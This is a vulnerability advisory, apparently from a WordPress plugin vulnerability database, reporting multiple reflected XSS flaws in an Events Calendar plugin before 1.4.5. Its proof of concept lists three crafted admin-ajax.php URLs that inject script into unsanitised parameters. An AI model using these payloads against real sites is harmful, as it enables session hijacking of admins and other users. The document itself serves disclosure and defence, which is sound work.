WordPress Plugin Vulnerabilities
WordPress Events Calendar Plugin < 1.4.5 - Multiple Reflected XSS
Description
The plugin does not sanitize and escapes a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against both unauthenticated and authenticated users (such as high-privilege ones like admin).
Proof of Concept
1. Create a new calendar in the plugin's settings page (most payloads below require at least one calendar to exist) Attack: Make any unauthenticated or authenticated user (such as an admin) open one of the URLs below: 1. https://exmple.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(`xss`)</script> 2. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX"><script>alert(`xss`);</script> 3. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(`xss`)</script>
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-12-20 (about 1 years ago)
Added
2022-12-20 (about 1 years ago)
Last Updated
2022-12-20 (about 1 years ago)